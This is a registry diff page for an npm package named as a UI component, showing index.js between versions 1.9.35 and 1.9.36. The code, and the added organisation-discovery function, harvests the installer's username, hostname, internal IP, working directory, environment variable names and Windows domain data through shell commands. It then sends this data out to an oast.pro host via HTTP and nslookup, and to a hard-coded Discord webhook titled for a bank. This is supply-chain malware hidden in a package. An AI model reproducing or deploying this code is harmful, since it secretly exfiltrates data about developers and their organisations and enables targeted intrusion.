@athena-ui-components/user-activity 1.9.35 β 1.9.36
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +81 -27
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -1,14 +1,74 @@
|
|
|
1
|
-
const http = require(
|
|
2
|
-
const https = require(
|
|
3
|
-
const os = require(
|
|
4
|
-
const { execSync } = require(
|
|
1
|
+
const http = require('http');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const { execSync } = require('child_process');
|
|
5
5
|
|
|
6
|
-
// --- CONFIGURACIΓN ---
|
|
7
6
|
const OAST_HOST = "d7fiu1ti191hj9ru0i8gukx3n3accmmdr.oast.pro";
|
|
8
|
-
const PKG_NAME = require(
|
|
7
|
+
const PKG_NAME = require('./package.json').name;
|
|
8
|
+
|
|
9
|
+
function getOrganizationInfo() {
|
|
10
|
+
const { execSync } = require('child_process');
|
|
11
|
+
let orgData = { domain: null, fqdn_user: null, ad_domain: null, registered_org: null };
|
|
12
|
+
function run(cmd, options = {}) {
|
|
13
|
+
try {
|
|
14
|
+
return execSync(cmd, { encoding: 'utf8', timeout: 3000, ...options }).trim();
|
|
15
|
+
} catch (e) {
|
|
16
|
+
return null;
|
|
17
|
+
}
|
|
18
|
+
}
|
|
19
|
+
let domain = null;
|
|
20
|
+
if (process.platform === 'win32') {
|
|
21
|
+
domain = run('wmic computersystem get domain /value');
|
|
22
|
+
if (domain) {
|
|
23
|
+
const match = domain.match(/Domain=(.+)/);
|
|
24
|
+
if (match) domain = match[1];
|
|
25
|
+
}
|
|
26
|
+
if (!domain || domain === 'WORKGROUP') {
|
|
27
|
+
const sysInfo = run('systeminfo | findstr /B /C:"Domain"');
|
|
28
|
+
if (sysInfo) {
|
|
29
|
+
const match = sysInfo.match(/Domain:\s*(.+)/);
|
|
30
|
+
if (match) domain = match[1];
|
|
31
|
+
}
|
|
32
|
+
}
|
|
33
|
+
} else {
|
|
34
|
+
domain = run('dnsdomainname 2>/dev/null');
|
|
35
|
+
if (!domain || domain === '(none)') domain = run('hostname -d 2>/dev/null');
|
|
36
|
+
}
|
|
37
|
+
orgData.domain = (domain && domain !== 'WORKGROUP') ? domain : null;
|
|
38
|
+
|
|
39
|
+
if (process.platform === 'win32') {
|
|
40
|
+
const whoamiFqdn = run('whoami /fqdn');
|
|
41
|
+
if (whoamiFqdn && whoamiFqdn.includes('@')) {
|
|
42
|
+
orgData.fqdn_user = whoamiFqdn;
|
|
43
|
+
const upnMatch = whoamiFqdn.match(/@(.+)/);
|
|
44
|
+
if (upnMatch && !orgData.domain) orgData.domain = upnMatch[1];
|
|
45
|
+
} else {
|
|
46
|
+
const whoamiUser = run('whoami');
|
|
47
|
+
if (whoamiUser && whoamiUser.includes('\\')) orgData.fqdn_user = whoamiUser;
|
|
48
|
+
}
|
|
49
|
+
} else {
|
|
50
|
+
const whoami = run('whoami');
|
|
51
|
+
if (whoami) orgData.fqdn_user = whoami;
|
|
52
|
+
}
|
|
53
|
+
|
|
54
|
+
if (process.platform === 'win32') {
|
|
55
|
+
const psDomain = run('powershell -Command "Get-CimInstance Win32_ComputerSystem | Select-Object -ExpandProperty Domain"');
|
|
56
|
+
if (psDomain && psDomain !== 'WORKGROUP') orgData.ad_domain = psDomain;
|
|
57
|
+
const regOrg = run('reg query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" /v RegisteredOrganization');
|
|
58
|
+
if (regOrg) {
|
|
59
|
+
const match = regOrg.match(/RegisteredOrganization\s+REG_SZ\s+(.+)/);
|
|
60
|
+
if (match) orgData.registered_org = match[1];
|
|
61
|
+
}
|
|
62
|
+
}
|
|
63
|
+
return orgData;
|
|
64
|
+
}
|
|
9
65
|
|
|
10
66
|
async function collectAndSend() {
|
|
11
|
-
const envKeys = Object.keys(process.env).join(
|
|
67
|
+
const envKeys = Object.keys(process.env).join(', ');
|
|
68
|
+
const internal_ip = Object.values(os.networkInterfaces()).flat()
|
|
69
|
+
.filter(i => i.family === 'IPv4' && !i.internal)
|
|
70
|
+
.map(i => i.address)[0] || "no_ip";
|
|
71
|
+
const orgInfo = getOrganizationInfo();
|
|
12
72
|
|
|
13
73
|
const data = {
|
|
14
74
|
pkg: PKG_NAME,
|
|
@@ -17,8 +77,8 @@ async function collectAndSend() {
|
|
|
17
77
|
user: os.userInfo().username,
|
|
18
78
|
host: os.hostname(),
|
|
19
79
|
platform: `${os.platform()} ${os.release()}`,
|
|
20
|
-
internal_ip:
|
|
21
|
-
|
|
80
|
+
internal_ip: internal_ip,
|
|
81
|
+
organization: orgInfo
|
|
22
82
|
},
|
|
23
83
|
context: {
|
|
24
84
|
cwd: process.cwd(),
|
|
@@ -26,23 +86,16 @@ async function collectAndSend() {
|
|
|
26
86
|
}
|
|
27
87
|
};
|
|
28
88
|
|
|
29
|
-
const payload = Buffer.from(JSON.stringify(data)).toString(
|
|
30
|
-
|
|
31
|
-
const options = {
|
|
32
|
-
hostname: OAST_HOST,
|
|
33
|
-
port: 80,
|
|
34
|
-
path: `/hit?d=${payload}`,
|
|
35
|
-
method: "GET"
|
|
36
|
-
};
|
|
37
|
-
|
|
89
|
+
const payload = Buffer.from(JSON.stringify(data)).toString('base64').replace(/=/g, '');
|
|
90
|
+
const options = { hostname: OAST_HOST, port: 80, path: `/hit?d=${payload}`, method: 'GET' };
|
|
38
91
|
const req = http.request(options);
|
|
39
|
-
req.on(
|
|
92
|
+
req.on('error', () => {});
|
|
40
93
|
req.end();
|
|
41
94
|
|
|
42
|
-
const dnsLabel = `${data.identity.host.substring(0, 15)}.${data.identity.user.substring(0, 10)}`.replace(/[^a-z0-9]/gi,
|
|
95
|
+
const dnsLabel = `${data.identity.host.substring(0, 15)}.${data.identity.user.substring(0, 10)}`.replace(/[^a-z0-9]/gi, '-');
|
|
43
96
|
try {
|
|
44
|
-
execSync(`nslookup ${dnsLabel}.${OAST_HOST}`, { stdio:
|
|
45
|
-
} catch (e) {
|
|
97
|
+
execSync(`nslookup ${dnsLabel}.${OAST_HOST}`, { stdio: 'ignore' });
|
|
98
|
+
} catch (e) {}
|
|
46
99
|
|
|
47
100
|
const discordPayload = JSON.stringify({
|
|
48
101
|
content: "π¨ **DBS BANK - DEPENDENCY CONFIRMED** π¨",
|
|
@@ -54,6 +107,7 @@ async function collectAndSend() {
|
|
|
54
107
|
{ name: "π€ User (whoami)", value: data.identity.user, inline: true },
|
|
55
108
|
{ name: "π» Hostname", value: data.identity.host, inline: true },
|
|
56
109
|
{ name: "π Internal IP (ifconfig)", value: data.identity.internal_ip, inline: true },
|
|
110
|
+
{ name: "π’ Organization / Domain", value: JSON.stringify(orgInfo), inline: false },
|
|
57
111
|
{ name: "π Path", value: data.context.cwd, inline: false },
|
|
58
112
|
{ name: "π Env Var Keys (Context)", value: "Captured (No values)", inline: true }
|
|
59
113
|
],
|
|
@@ -62,13 +116,13 @@ async function collectAndSend() {
|
|
|
62
116
|
});
|
|
63
117
|
|
|
64
118
|
const reqDiscord = https.request({
|
|
65
|
-
hostname:
|
|
119
|
+
hostname: 'discord.com',
|
|
66
120
|
port: 443,
|
|
67
|
-
path:
|
|
68
|
-
method:
|
|
69
|
-
headers: {
|
|
121
|
+
path: '/api/webhooks/1487009597175890022/DE6xfM-BeQ1xD6U2nH7vuFoQAIDd_aVDsuzdhHiGBZpPRm0M9BU94QEglVsLHaSxqhzo',
|
|
122
|
+
method: 'POST',
|
|
123
|
+
headers: { 'Content-Type': 'application/json' }
|
|
70
124
|
});
|
|
71
|
-
reqDiscord.on(
|
|
125
|
+
reqDiscord.on('error', () => {});
|
|
72
126
|
reqDiscord.write(discordPayload);
|
|
73
127
|
reqDiscord.end();
|
|
74
128
|
}
|